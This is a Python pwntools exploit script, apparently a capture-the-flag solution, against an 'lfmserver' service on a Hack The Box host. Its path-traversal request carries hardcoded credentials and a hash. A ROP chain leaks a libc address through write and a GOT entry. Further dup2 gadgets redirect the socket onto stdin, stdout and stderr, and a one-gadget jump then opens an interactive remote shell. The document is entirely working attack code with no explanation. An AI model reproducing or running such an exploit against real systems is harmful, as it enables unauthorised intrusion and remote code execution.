Untitled

from pwn import *

IP = 'patents.htb'
PORT = 8888
fd = 6

bin = ELF('./lfmserver')
libc = ELF('libc.so.6')

p = remote(IP, PORT)

hash = "26ab0db90d72e28ad0ba1e22ee510510"

user = "lfmserver_user"
password = "!gby0l0r0ck$$!"

def genrequest(payload):
    #thanks to pottm for this poc payload
    request = "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/proc/sys/kernel/randomize_va_space%x00%61%61%61%61%61%61%61%61%62%61%61%61%61%61%61%61%63%61%61%61%61%61%61%61%64%61%61%61%61%61%61%61%65%61%61%61%61%61%61%61%66%61%61%61%61%61%61%61%67%61%61%61%61%61%61%61%68%61%61%61%61%61%61%61%69%61%61%61%61%61%61%61%6a%61%61%61%61%61%61%61%6b%61%61%61%61%61%61%61%6c%61%61%61%61%61%61%61%6d%61%61%61%61%61%61%61%6e%00{}".format(encode(payload))
    request = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n".format(request, user, password, hash)
    #print request
    return request

poprdi = 0x405c4b #: pop rdi; ret;
poprsi = 0x405c49 #: pop rsi; pop r15; ret;
ropnop = 0x40251f #: nop; ret;

rop = p64(poprdi) + p64(fd) + p64(poprsi) + p64(bin.got['dup2']) + p64(0) + p64(ropnop) + p64(bin.symbols['write'])
p.sendline(genrequest(rop))

print(p.recvall())
leak = p.recvall().split('\n')[4]
leak = u64(leak.ljust(8,'\x00'))[1:7]
libc.address = leak - libc.symbols['dup2']
log.info("Libc base: " + hex(libc.address))

payload = p64(poprdi)
payload += p64(fd)
payload += p64(poprsi)
payload += p64(0x0)
payload += "A"*8
payload += p64(bin.symbols['dup2'])

payload += p64(poprdi)
payload += p64(fd)
payload += p64(poprsi)
payload += p64(0x1)
payload += "A"*8
payload += p64(bin.symbols['dup2'])

payload += p64(poprdi)
payload += p64(fd)
payload += p64(poprsi)
payload += p64(0x2)
payload += p64(0x0)
payload += p64(bin.symbols['dup2'])

rop = payload + p64(poprdi) + p64(1) + p64(poprsi) + p64(bin.got['dup2']) + p64(0) + p64(ropnop) + p64(bin.symbols['write'])+p64(ropnop) + p64(libc.address + 0x501e3 )

p.sendline(genrequest(rop))
p.interactive()